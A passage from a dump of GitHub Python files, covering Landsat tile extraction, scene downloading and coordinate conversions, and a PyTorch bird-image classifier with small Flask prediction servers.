"text": "import os\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nfrom PIL import Image\nfrom pyproj import Proj\nfrom scipy.ndimage.filters import gaussian_filter\nfrom coord_transform import bd2wgs, gcj2wgs, wgs2utm\n\n# lest pillow complain\nImage.MAX_IMAGE_PIXELS = 1000000000\n\n# all purpose transform\ndef ensure_wgs(lon, lat, proj):\n if proj == 'bd-09':\n return bd2wgs(lon, lat)\n elif proj == 'gcj-02':\n return gcj2wgs(lon, lat)\n elif proj == 'wgs-84':\n return lon, lat\n else:\n raise('Unknown projection')\n\n# to limit directory sizes\ndef store_chunk(tag, loc, ext='jpg'):\n tag = f'{tag:07d}'\n sub = tag[:4]\n psub = f'{loc}/{sub}'\n os.makedirs(psub, exist_ok=True)\n ptag = f'{psub}/{tag}.{ext}'\n return ptag\n\n##\n## scenes\n##\n\n# parse scene metadata\ndef parse_mtl(fname):\n # hacky parse\n lines = [s.strip() for s in open(fname)]\n corners = [s for s in lines if s.startswith('CORNER')]\n utm = [s for s in lines if s.startswith('UTM')]\n fields = corners + utm\n vals = pd.Series(dict([s.split(' = ') for s in fields]))\n meta = vals.astype(np.float)\n\n # additional utm stats\n meta['UTM_WEST'] = 0.5*(meta['CORNER_LL_PROJECTION_X_PRODUCT']+meta['CORNER_UL_PROJECTION_X_PRODUCT'])\n meta['UTM_EAST'] = 0.5*(meta['CORNER_LR_PROJECTION_X_PRODUCT']+meta['CORNER_UR_PROJECTION_X_PRODUCT'])\n meta['UTM_NORTH'] = 0.5*(meta['CORNER_UL_PROJECTION_Y_PRODUCT']+meta['CORNER_UR_PROJECTION_Y_PRODUCT'])\n meta['UTM_SOUTH'] = 0.5*(meta['CORNER_LL_PROJECTION_Y_PRODUCT']+meta['CORNER_LR_PROJECTION_Y_PRODUCT'])\n meta['UTM_WIDTH'] = meta['UTM_EAST'] - meta['UTM_WEST']\n meta['UTM_HEIGHT'] = meta['UTM_NORTH']- meta['UTM_SOUTH']\n\n return meta\n\n# find scene from wgs84 coordinates\ndef find_scene(lon, lat, index, best=True):\n if type(index) is str:\n index = load_index(index)\n prods = index[\n (index['NORTH_LAT'] >= lat) &\n (index['SOUTH_LAT'] <= lat) &\n (index['EAST_LON' ] >= lon) &\n (index['WEST_LON' ] <= lon)\n ]\n if len(prods) == 0:\n return None\n if best:\n c_lon = 0.5*(prods['WEST_LON']+prods['EAST_LON'])\n c_lat = 0.5*(prods['NORTH_LAT']+prods['SOUTH_LAT'])\n dist = np.sqrt((c_lon-lon)**2+(c_lat-lat)**2)\n best = prods.loc[dist.idxmin()]\n return best['PRODUCT_ID']\n else:\n return prods\n\n# load scene imagery and metadata\ndef load_scene(pid, chan='B8'):\n meta = parse_mtl(f'../data/scenes/{pid}_MTL.txt')\n image = Image.open(f'../data/scenes/{pid}_{chan}.TIF')\n return meta, image\n\n##\n## satellite\n##\n\n# assumes WGS84 datum\ndef extract_satelite_core(lon, lat, meta, image, rad=512):\n utm_zone = meta['UTM_ZONE']\n utm_hemi = 'north' if lat >= 0 else 'south'\n utm_proj = Proj(f'+proj=utm +zone={utm_zone}, +{utm_hemi} +ellps=WGS84 +datum=WGS84 +units=m +no_defs')\n\n x, y = utm_proj(lon, lat)\n fx = (x-meta['UTM_WEST'])/meta['UTM_WIDTH']\n fy = (y-meta['UTM_SOUTH'])/meta['UTM_HEIGHT']\n\n sx, sy = image.size\n px, py = int(fx*sx), int((1-fy)*sy) # image origin is top-left\n box = (px-rad, py-rad, px+rad, py+rad)\n im = image.crop(box)\n\n return im\n\n# extract just one tile, for testing\ndef extract_satelite_tile(lon, lat, rad, pid=None, index=None, size=None, proj='bd-09', chan='B8', image=True, resample=Image.LANCZOS):\n lon, lat = ensure_wgs(lon, lat, proj)\n if pid is None:\n pid = find_scene(lon, lat, index)\n meta, image = load_scene(pid, chan=chan)\n im = extract_satelite_core(lon, lat, meta, image, rad=rad)\n im = im.resize((size, size), resample=resample)\n if image:\n return im\n else:\n return np.asarray(im)\n\n# firms is a (tag, lon, lat, 
prod) file. assumes WGS84 datum\ndef extract_satelite_firm(firms, output, rad=[256, 1024], size=256, resample=Image.LANCZOS, chan='B8', ext='jpg', overwrite=False):\n if type(firms) is str:\n firms = pd.read_csv(firms)\n firms['id'] = firms['id'].astype(np.int)\n if type(rad) is int:\n rad = [rad]\n\n firms = firms.sort_values(by=['prod_id', 'id'])\n pmap = firms.groupby('prod_id').groups\n print(len(pmap))\n\n for pid in pmap:\n print(pid)\n meta, image = load_scene(pid, chan=chan)\n for idx in pmap[pid]:\n tag, lon, lat = firms.loc[idx][['id', 'lon_wgs84', 'lat_wgs84']]\n for r in rad:\n path = f'{output}/{r}px'\n fname = store_chunk(tag, path, ext=ext)\n if overwrite or not os.path.exists(fname):\n tile = extract_satelite_core(lon, lat, meta, image, rad=r)\n tile = tile.resize((size, size), resample=resample)\n tile.save(fname)\n"
},
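An illustrative call into the tile extractor above; it assumes the scene index and GeoTIFFs were downloaded per the README, and the coordinate and paths are made up.

```python
# Illustrative usage; requires downloaded scenes under ../data/scenes.
import pandas as pd
from tiles_satellite import extract_satelite_tile

index = pd.read_csv('../index/scenes/google_scenes_2002_mincloud.csv')
tile = extract_satelite_tile(116.404, 39.915, rad=512, index=index,
                             size=256, proj='bd-09', chan='B8')
tile.save('preview_tile.png')  # a 256x256 crop centered on the point
```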
{
"alpha_fraction": 0.6537007093429565,
"alphanum_fraction": 0.6607239246368408,
"avg_line_length": 37.5625,
"blob_id": "8567228680e980cee69ad6755027ce6b98a239d1",
"content_id": "1f88229c3d11388327d2392bb77a4d481c009312",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1851,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 48,
"path": "/code/fetch_scenes.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "#!/bin/env python3\n\nimport os\nimport sys\nimport time\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser(description='Generate list of scenes matching certain criterion.')\nparser.add_argument('scenes', type=str, help='path to scene list')\nparser.add_argument('--output', type=str, default='data/scenes', help='directory to output to')\nparser.add_argument('--wait', type=int, default=1, help='delay between file requests')\nparser.add_argument('--dryrun', action='store_true', help='just print out commands to run')\nparser.add_argument('--overwrite', action='store_true', help='always overwrite files')\nargs = parser.parse_args()\n\nfname_fmt = '{prod}_{chan}.{ext}'\nurl_fmt = 'gs://gcp-public-data-landsat/LE07/01/{path:03d}/{row:03d}/{prod}/{prod}_{chan}.{ext}'\n\nfetch_list = []\nfor i, targ in pd.read_csv(args.scenes).dropna().iterrows():\n scene, prod = targ['SCENE_ID'], targ['PRODUCT_ID']\n path, row = targ['WRS_PATH'], targ['WRS_ROW']\n\n fname = fname_fmt.format(prod=prod, chan='B8', ext='TIF')\n fpath = os.path.join(args.output, fname)\n if args.overwrite or not os.path.isfile(fpath):\n url = url_fmt.format(prod=prod, path=path, row=row, chan='B8', ext='TIF')\n fetch_list.append((prod, fpath, url))\n\n fname = fname_fmt.format(prod=prod, chan='MTL', ext='txt')\n fpath = os.path.join(args.output, fname)\n if args.overwrite or not os.path.isfile(fpath):\n url = url_fmt.format(prod=prod, path=path, row=row, chan='MTL', ext='txt')\n fetch_list.append((prod, fpath, url))\n\nfor prod, fpath, url in sorted(fetch_list, key=lambda x: x[0]):\n print(f'Fetching {prod}: {url} -> {fpath}')\n cmd = f'gsutil cp {url} {fpath}'\n if args.dryrun:\n print(cmd)\n else:\n os.system(cmd)\n print()\n time.sleep(args.wait)\n\nif args.dryrun:\n print(len(fetch_list))\n"
},
{
"alpha_fraction": 0.43938618898391724,
"alphanum_fraction": 0.5332480669021606,
"avg_line_length": 32.7068977355957,
"blob_id": "c31837ca865c2a770a167c03869eda1ef526f1e2",
"content_id": "1827280f3d6752d6b3b910e0980aab7295b29652",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3910,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 116,
"path": "/code/coord_transform.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom math import sin, cos, sqrt, fabs, atan2\nfrom math import pi as pi\n\n# define ellipsoid\na = 6378245.0\nf = 1 / 298.3\nb = a * (1 - f)\nee = 1 - (b * b) / (a * a)\n\ndef outOfChina(lng, lat):\n return not (72.004 <= lng <= 137.8347 and 0.8293 <= lat <= 55.8271)\n\ndef transformLat(x, y):\n ret = -100.0 + 2.0 * x + 3.0 * y + 0.2 * y * y + 0.1 * x * y + 0.2 * sqrt(fabs(x))\n ret = ret + (20.0 * sin(6.0 * x * pi) + 20.0 * sin(2.0 * x * pi)) * 2.0 / 3.0\n ret = ret + (20.0 * sin(y * pi) + 40.0 * sin(y / 3.0 * pi)) * 2.0 / 3.0\n ret = ret + (160.0 * sin(y / 12.0 * pi) + 320.0 * sin(y * pi / 30.0)) * 2.0 / 3.0\n return ret\n\ndef transformLon(x, y):\n ret = 300.0 + x + 2.0 * y + 0.1 * x * x + 0.1 * x * y + 0.1 * sqrt(fabs(x))\n ret = ret + (20.0 * sin(6.0 * x * pi) + 20.0 * sin(2.0 * x * pi)) * 2.0 / 3.0\n ret = ret + (20.0 * sin(x * pi) + 40.0 * sin(x / 3.0 * pi)) * 2.0 / 3.0\n ret = ret + (150.0 * sin(x / 12.0 * pi) + 300.0 * sin(x * pi / 30.0)) * 2.0 / 3.0\n return ret\n\ndef wgs2gcj(wgsLon, wgsLat):\n if outOfChina(wgsLon, wgsLat):\n return wgsLon, wgsLat\n dLat = transformLat(wgsLon - 105.0, wgsLat - 35.0)\n dLon = transformLon(wgsLon - 105.0, wgsLat - 35.0)\n radLat = wgsLat / 180.0 * pi\n magic = sin(radLat)\n magic = 1 - ee * magic * magic\n sqrtMagic = sqrt(magic)\n dLat = (dLat * 180.0) / ((a * (1 - ee)) / (magic * sqrtMagic) * pi)\n dLon = (dLon * 180.0) / (a / sqrtMagic * cos(radLat) * pi)\n gcjLat = wgsLat + dLat\n gcjLon = wgsLon + dLon\n return gcjLon, gcjLat\n\ndef gcj2wgs(gcjLon, gcjLat):\n g0 = gcjLon, gcjLat\n w0 = g0\n g1 = wgs2gcj(w0[0], w0[1])\n # w1 = w0 - (g1 - g0)\n w1 = tuple(map(lambda x: x[0]-(x[1]-x[2]), zip(w0,g1,g0)))\n # delta = w1 - w0\n delta = tuple(map(lambda x: x[0] - x[1], zip(w1, w0)))\n while (abs(delta[0]) >= 1e-6 or abs(delta[1]) >= 1e-6):\n w0 = w1\n g1 = wgs2gcj(w0[0], w0[1])\n # w1 = w0 - (g1 - g0)\n w1 = tuple(map(lambda x: x[0]-(x[1]-x[2]), zip(w0,g1,g0)))\n # delta = w1 - w0\n delta = tuple(map(lambda x: x[0] - x[1], zip(w1, w0)))\n return w1\n\ndef gcj2bd(gcjLon, gcjLat):\n z = sqrt(gcjLon * gcjLon + gcjLat * gcjLat) + 0.00002 * sin(gcjLat * pi * 3000.0 / 180.0)\n theta = atan2(gcjLat, gcjLon) + 0.000003 * cos(gcjLon * pi * 3000.0 / 180.0)\n bdLon = z * cos(theta) + 0.0065\n bdLat = z * sin(theta) + 0.006\n return bdLon, bdLat\n\ndef bd2gcj(bdLon, bdLat):\n x = bdLon - 0.0065\n y = bdLat - 0.006\n z = sqrt(x * x + y * y) - 0.00002 * sin(y * pi * 3000.0 / 180.0)\n theta = atan2(y, x) - 0.000003 * cos(x * pi * 3000.0 / 180.0)\n gcjLon = z * cos(theta)\n gcjLat = z * sin(theta)\n return gcjLon, gcjLat\n\ndef wgs2bd(wgsLon, wgsLat):\n gcj = wgs2gcj(wgsLon, wgsLat)\n return gcj2bd(gcj[0], gcj[1])\n\ndef bd2wgs(bdLon, bdLat):\n gcj = bd2gcj(bdLon, bdLat)\n return gcj2wgs(gcj[0], gcj[1])\n\n##\n## UTM conversions\n##\n\nrows = 'CDEFGHJKLMNPQRSTUVWX'\nzones = [z for z in range(1, 60+1)]\nfrow = {i: c for i, c in enumerate(rows)}\nrrow = {c: i for i, c in enumerate(rows)}\n\ndef wgs2utm(lon_wgs, lat_wgs):\n idx_lon = int(round(lon_wgs/6.0 + 30.5))\n idx_lat = int(round(lat_wgs/8.0 + 9.5))\n utm_lon = ((idx_lon-1) % 60) + 1\n utm_lat = frow[idx_lat]\n return f'{utm_lon}{utm_lat}'\n\ndef utm_center_wgs(lon_utm, lat_utm):\n idx_lon = lon_utm - 1\n idx_lat = rrow[lat_utm]\n lon_wgs = 6*(idx_lon - 30) + 3\n lat_wgs = 8*(idx_lat - 10) + 4\n return lon_wgs, lat_wgs\n\ndef gen_utm_centers():\n for z, r in product(zones, rows):\n utm = f'{z}{r}'\n proj = Proj(f'+proj=utm +zone={utm}, +ellps=WGS84 +datum=WGS84 +units=m 
+no_defs')\n lon, lat = utm_center_wgs(z, r)\n east, north = proj(lon, lat)\n yield utm, lon, lat, east, north\n\ndef utm_centers():\n return pd.DataFrame(gen_utm_centers(), columns=['utm', 'lon', 'lat', 'east', 'north'])\n"
}
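Since `gcj2wgs` inverts `wgs2gcj` by fixed-point iteration, a round trip should agree to the 1e-6 tolerance; a quick check on one illustrative point:

```python
# Round-trip sanity check for the datum transforms (sample point only).
from coord_transform import wgs2bd, bd2wgs

lon, lat = 116.404, 39.915  # WGS-84 input inside China
back = bd2wgs(*wgs2bd(lon, lat))
print(max(abs(back[0] - lon), abs(back[1] - lat)) < 1e-5)  # True
```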
] | 17 |
NomanTrips/bird-classifier | https://github.com/NomanTrips/bird-classifier | 2fd1da60c58bceaf3c1a1ea093755f5df37691e8 | 5a03a52d9311a8fe72a43bc48b21afe201f481f9 | 7141c248bd66423758f8b4345e17f07ce7357614 | refs/heads/main | 2023-02-03T09:26:35.120580 | 2020-12-23T16:00:06 | 2020-12-23T16:00:06 | 316,287,410 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6320346593856812,
"alphanum_fraction": 0.6320346593856812,
"avg_line_length": 32.07143020629883,
"blob_id": "69e0f938a8be23524b345d0e9efeeaa245bf57f2",
"content_id": "2faa84c6cfab618bffbd10aa4bcabb2b7fc7c6e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 14,
"path": "/python_code/api.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "from flask import Flask, jsonify\nfrom flask import request\napp = Flask(__name__)\n\n\[email protected]('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n # we will get the file from the request\n file = request.files['file']\n # convert that to bytes\n img_bytes = file.read()\n class_id, class_name = get_prediction(image_bytes=img_bytes)\n return jsonify({'class_id': class_id, 'class_name': class_name})"
},
{
"alpha_fraction": 0.604087233543396,
"alphanum_fraction": 0.6286411285400391,
"avg_line_length": 33.87765884399414,
"blob_id": "ad1704be8f07f222684bd0b2a21f02932121c9fa",
"content_id": "7ae0d0b9dd5f633110aa3d22ca3f47b7fda9fd22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6557,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 188,
"path": "/python_code/model.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\n# Specify transforms using torchvision.transforms as transforms\ntransformations = transforms.Compose([\n transforms.Resize(150),\n transforms.CenterCrop(150),\n transforms.ToTensor(),\n transforms.Normalize(mean=[.5, .5, .5], std=[.225, .225, .225])\n #transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\n# Load in each dataset and apply transformations using\n# the torchvision datasets as datasets library\n\ntrain_set = datasets.ImageFolder(\"data/train/\", transform = transformations)\ntest_set = datasets.ImageFolder(\"data/test/\", transform = transformations)\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=4, shuffle=True)\n#train_loader = torch.utils.data.DataLoader(train_set, batch_size=len(train_set))\ntest_loader = torch.utils.data.DataLoader(test_set, batch_size =4, shuffle=True)\n\nclasses = [0,1]\n\n# functions to show an image\ndef imshow(img):\n img = img.cpu()\n #img = img / 2 + 0.5 # unnormalize ((image * std) + mean)\n img = ((img * .225) + .5) # unnormalize ((image * std) + mean)\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n plt.show()\n\n# get some random training images\ndataiter = iter(train_loader)\nimages, labels = dataiter.next()\nimages = images.to(device)\nlabels = labels.to(device)\n\n# print labels\nprint(labels)\n#print(' '.join('%5s' % classes[labels[j]] for j in range(4)))\n# show images\nimshow(torchvision.utils.make_grid(images))\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n # 1 input image channel, 6 output channels, 3x3 square convolution\n # kernel\n self.conv1 = nn.Conv2d(3, 24, 11)\n self.conv2 = nn.Conv2d(24, 16, 5)\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(17424, 5808) # 6*6 from image dimension\n self.fc2 = nn.Linear(5808, 1024)\n self.fc3 = nn.Linear(1024, 1)\n\n def forward(self, x):\n # Max pooling over a (2, 2) window\n x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))\n # If the size is a square you can only specify a single number\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n x = torch.sigmoid(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\nnet = Net()\nnet.to(device)\n#print(net)\n\ncriterion = nn.BCELoss()#nn.CrossEntropyLoss()\n#criterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)\nlosses = []\nminibatch_size = 4\nm = len(train_set)\n\n# Print model's state_dict\n#print(\"Model's state_dict:\")\n#for param_tensor in net.state_dict():\n# print(param_tensor, \"\\t\", net.state_dict()[param_tensor].size())\n\n# Print optimizer's state_dict\n#print(\"Optimizer's state_dict:\")\n#for var_name in optimizer.state_dict():\n# print(var_name, \"\\t\", optimizer.state_dict()[var_name])\n\ndef train_net():\n for epoch in range(30): # loop over the dataset multiple times\n minibatch_cost = 0.\n num_minibatches = 
int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set\n running_loss = 0.0\n for i, data in enumerate(train_loader, 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, labels = data\n inputs = inputs.to(device)\n labels = labels.to(device)\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = net(inputs).squeeze(1)\n #print(outputs)\n #print(labels.float())\n loss = criterion(outputs, labels.float()) # labels\n loss.backward()\n minibatch_cost += loss.item() / num_minibatches\n optimizer.step()\n\n if epoch % 5 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, minibatch_cost))\n if epoch % 1 == 0:\n losses.append(minibatch_cost)\n print('Finished Training')\n # plot the cost\n plt.plot(np.squeeze(losses))\n plt.ylabel('loss')\n plt.xlabel('iterations (per tens)')\n plt.title(\"placeholder\")\n #plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\ndef predict(data_loader):\n correct = 0\n total = 0\n for i, data in enumerate(data_loader, 0):\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n outputs = net(images)\n predicted = outputs.detach().cpu().numpy().squeeze(1) # put the output predictions in a 1D numpy array\n labels_np = labels.detach().cpu().numpy()\n probability = 0\n for i, x in enumerate(predicted): # convert the sigmoid output to a 0 or 1 prediction\n if x > .5:\n probability = 1\n else:\n probability = 0\n total += 1\n correct += (probability == labels_np[i])\n percent_correct = 100 * correct / total\n print('Accuracy of the network on the %d images: %d %%' %(total, percent_correct))\n\ndef show_predictions(data_loader):\n dataiter = iter(data_loader)\n images, labels = dataiter.next()\n images = images.to(device)\n labels = labels.to(device)\n imshow(torchvision.utils.make_grid(images))\n print('GroundTruth: ', ' '.join('%5s' % labels[j].detach().cpu().numpy() for j in range(minibatch_size)))\n outputs = net(images)\n predicted = outputs.detach().cpu().numpy().squeeze(1) # put the output predictions in a 1D numpy array\n probas = np.array([])\n for i, x in enumerate(predicted): # convert the sigmoid output to a 0 or 1 prediction\n if x > .5:\n probas = np.append(probas, 1)\n else:\n probas = np.append(probas, 0)\n print('Predicted: ', ' '.join('%5s' % int(probas[j]) for j in range(minibatch_size)))\n\ntrain_net()\npredict(train_loader)\npredict(test_loader)\nshow_predictions(test_loader)\n\ntorch.save(net.state_dict(), 'model.pt')\n"
},
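The magic number 17424 in `fc1` follows from the conv/pool arithmetic on the 150-pixel input; a short derivation matching the `Net` above:

```python
# Where fc1's 17424 input size comes from:
# 150 -> conv1(11x11) -> 140 -> maxpool(2) -> 70 -> conv2(5x5) -> 66 -> maxpool(2) -> 33
def conv_out(n, k):        # valid convolution, stride 1
    return n - k + 1

n = 150
n = conv_out(n, 11) // 2   # conv1 + 2x2 max pool -> 70
n = conv_out(n, 5) // 2    # conv2 + 2x2 max pool -> 33
print(16 * n * n)          # 16 channels * 33 * 33 = 17424
```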
{
"alpha_fraction": 0.6671949028968811,
"alphanum_fraction": 0.6946645379066467,
"avg_line_length": 29.063491821289062,
"blob_id": "cce2de204124585623b5089894857a88855f7e6c",
"content_id": "b3ffa73384a1b32f7d65c40b59c1bc6b6f9a7304",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1893,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 63,
"path": "/python_code/app_multiclass.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "import io\nimport json\n\nfrom torchvision import models\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\n#from model import Net\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\n\napp = Flask(__name__)\nCORS(app)\n\nclass_names = ['american-kestrel', 'bald-eagle', 'barred-owl', 'coopers-hawk', 'crow', 'great-horned-owl', 'non-hawk', 'northern-goshawk', 'osprey', 'peregrine-falcon', 'red-tailed-hawk', 'vulture']\n\n#model = models.resnet18(pretrained=True)\n#num_ftrs = model.fc.in_features\n#model.fc = nn.Linear(num_ftrs, 10)\nmodel = models.vgg16(pretrained=True)\nmodel.classifier[-1] = nn.Linear(in_features=4096, out_features=len(class_names))\nmodel.load_state_dict(torch.load('./vgg16_added_birds.pt', map_location=torch.device('cpu')))\nmodel.eval()\n\n#print(model)\n\ndef transform_image(image_bytes):\n my_transforms = transforms.Compose([\n transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n image = Image.open(io.BytesIO(image_bytes))\n return my_transforms(image).unsqueeze(0)\n\n\ndef get_prediction(image_bytes):\n tensor = transform_image(image_bytes=image_bytes)\n outputs = model.forward(tensor)\n _, predicted = torch.max(outputs, 1)\n m = nn.Softmax(dim=1)\n input = torch.randn(2, 3)\n output = m(outputs)\n predicted_class = class_names[predicted]\n return predicted_class\n\n\[email protected]('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n file = request.files['file']\n img_bytes = file.read()\n predicted_class = get_prediction(image_bytes=img_bytes)\n return jsonify({'class': predicted_class})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')"
},
{
"alpha_fraction": 0.542958676815033,
"alphanum_fraction": 0.5768733620643616,
"avg_line_length": 29.663366317749023,
"blob_id": "776d251dbfc97169cdcef6321e5434815c710afe",
"content_id": "3c7f54fcc30ec2d38756b2bcb88e2468a091bdec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3096,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 101,
"path": "/python_code/app.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "import io\nimport json\n\nfrom torchvision import models\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\n#from model import Net\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n # 1 input image channel, 6 output channels, 3x3 square convolution\n # kernel\n self.conv1 = nn.Conv2d(3, 24, 11)\n self.conv2 = nn.Conv2d(24, 16, 5)\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(17424, 5808) # 6*6 from image dimension\n self.fc2 = nn.Linear(5808, 1024)\n self.fc3 = nn.Linear(1024, 1)\n\n def forward(self, x):\n # Max pooling over a (2, 2) window\n x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))\n # If the size is a square you can only specify a single number\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n x = torch.sigmoid(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\napp = Flask(__name__)\nCORS(app)\nimagenet_class_index = json.load(open('./imagenet_class_index.json'))\n#model = models.densenet121(pretrained=True)\nmodel = Net()\n#model = torch.load('./model.pt')\nmodel.load_state_dict(torch.load('./model.pt'))\nmodel.eval()\n\n\n\ndef transform_image(image_bytes):\n my_transforms = transforms.Compose([transforms.Resize(150),\n transforms.CenterCrop(150),\n transforms.ToTensor(),\n transforms.Normalize(\n [0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n image = Image.open(io.BytesIO(image_bytes))\n return my_transforms(image).unsqueeze(0)\n\n\ndef get_prediction(image_bytes):\n tensor = transform_image(image_bytes=image_bytes)\n outputs = model.forward(tensor)\n predicted = outputs.detach().cpu().numpy().squeeze(1)\n probability = 0\n for i, x in enumerate(predicted): # convert the sigmoid output to a 0 or 1 prediction\n if x > .5:\n probability = 1\n else:\n probability = 0\n print(probability)\n #_, y_hat = outputs.max(1)\n #predicted_idx = str(y_hat.item())\n #print(predicted_idx)\n if probability == 1:\n class_id = 1\n else:\n class_id = 0\n return class_id\n\n\[email protected]('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n file = request.files['file']\n img_bytes = file.read()\n class_id = get_prediction(image_bytes=img_bytes)\n return jsonify({'class_id': class_id})\n\n\nif __name__ == '__main__':\n app.run()"
},
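Editor's note: the magic number in `self.fc1 = nn.Linear(17424, 5808)` follows from the 150x150 input produced by this file's `transform_image`: conv1 (11x11, no padding) gives 140x140, a (2, 2) max-pool gives 70x70, conv2 (5x5) gives 66x66, pooling again gives 33x33, and 16 channels x 33 x 33 = 17424. A quick shape-only check (standalone, assuming the `Net` definition above):

```python
def conv_out(size, kernel, stride=1, padding=0):
    # Standard output-size formula for a square conv or pool layer.
    return (size + 2 * padding - kernel) // stride + 1

size = 150                   # input resolution from transform_image
size = conv_out(size, 11)    # conv1, 11x11 kernel -> 140
size = conv_out(size, 2, 2)  # max_pool2d (2, 2)   -> 70
size = conv_out(size, 5)     # conv2, 5x5 kernel   -> 66
size = conv_out(size, 2, 2)  # max_pool2d 2        -> 33
print(16 * size * size)      # 16 channels -> 17424
```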
{
"alpha_fraction": 0.4967532455921173,
"alphanum_fraction": 0.5844155550003052,
"avg_line_length": 43.14285659790039,
"blob_id": "c8dc770379b11f87ca4fee8effd97a85f2918f15",
"content_id": "5df4543a94fe62cc8322ec6afb8b8c60d3369da6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 7,
"path": "/python_code/sample_request.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
"text": "import requests\n\n#resp = requests.post(\"http://localhost:5000/predict\",\n# files={\"file\": open('../src/assets/hawk-three.jpg','rb')})\nresp = requests.post(\"http://52.37.86.143:5000/predict\",\n files={\"file\": open('../src/assets/00000018.jpg','rb')})\nprint(resp.json())"
},
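Editor's note: `sample_request.py` never closes the file handle it passes to `requests.post`. A context-manager variant avoids the leak; shown here against the commented-out localhost endpoint from the same file:

```python
import requests

# The with-block guarantees the file handle is closed after the upload.
with open('../src/assets/00000018.jpg', 'rb') as f:
    resp = requests.post("http://localhost:5000/predict", files={"file": f})
print(resp.json())
```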
{
"alpha_fraction": 0.6420249342918396,
"alphanum_fraction": 0.6595017910003662,
"avg_line_length": 33.811187744140625,
"blob_id": "98a68809749eb4559bb06931d6e56093090af83c",
"content_id": "7261f216c91e3d7101e8ee8287533b01d0ddc3f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4978,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 143,
"path": "/python_code/pretrained_model.py",
"repo_name": "NomanTrips/bird-classifier",
"src_encoding": "UTF-8",
